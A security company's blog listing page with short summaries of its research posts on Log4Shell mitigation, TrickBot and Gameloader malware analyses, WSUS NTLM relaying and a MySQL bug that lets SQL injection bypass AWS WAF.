GoSecure Blog
Get the Latest from GoSecure Titan Labs on Mitigation and Remediation for the Log4Shell Vulnerability
Updated on 12/15/2021 with the latest mitigation strategies for CVE-2021-44228 and CVE-2021-45046 including Log4J 1.2 status
GoSecure has been closely monitoring the Log4Shell vulnerability since it was discovered. Not only have we been proactively hunting across GoSecure TitanTM Managed Detection & Response (MDR), but we have also helped monitor and respond with patches for our clients through GoSecure Vulnerability Management as a Service (VMaaS) and supported clients with other managed security solutions.
So far, none of our GoSecure Titan MDR customers have been impacted by Log4Shell. The GoSecure Active Response Center (ARC) remains vigilant for any signs of breaches and new MDR detections have been added to increase the visibility of known Log4Shell activity.
To increase our detection and blocking capabilities, GoSecure Titan Labs performed extensive research on the vulnerability. The results of that work can be found in this blog, including some recommended mitigation and remediation actions.
TrickBot Leverages Zoom Work from Home Interview Malspam, Heaven’s Gate and… Spamhaus?
The team of expert analysts at GoSecure Titan labs have reverse-engineered a new TrickBot cleverly hidden in a Zoom job interview email through a sample obtained from GoSecure Titan Inbox Detection and Response (IDR). The email message contained a shortcut (LNK) file entitled Interview_details.lnk and that LNK file downloads a loader which will be examined in this blog. GoSecure Titan Labs named the loader TrickGate because it uses the Heaven’s Gate technique to load TrickBot, one of the world’s most prevalent botnets.
GoSecure Investigates Abusing Windows Server Update Services (WSUS) to Enable NTLM Relaying Attacks
In part three of a series, GoSecure ethical hackers have found another way to exploit insecure Windows Server Update Services (WSUS) configurations. By taking advantage of the authentication provided by the Windows update client and relaying it to other domain services, we found this can lead to remote code execution. In this blog, we’ll share our findings and recommend mitigations.
New Malware “Gameloader” in Discord Malspam Campaign Identified by GoSecure Titan Labs
The expert investigators at GoSecure Titan Labs have found, analyzed and created signatures to detect a new malware that they call Gameloader – since it and its variants contain numerous strings that attempt to disguise themselves as video games. The file Titan Labs used for their research was a Rich Text Format (RTF) file entitled New Purchase Order from Alibaba.doc provided by the GoSecure Titan Inbox Detection and Response (IDR) team. The RTF file downloads a 32-bit .NET loader, which loads FormBook Stealer. The following is an in-depth analysis of the Gameloader.
A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection
GoSecure ethical hackers found a bug in MySQL that has security consequences. As a result, AWS Web Application Firewall (WAF) customers were left unprotected to SQL injection. Our research team further confirmed modsecurity to be affected, but protection is within reach as described in this blog.
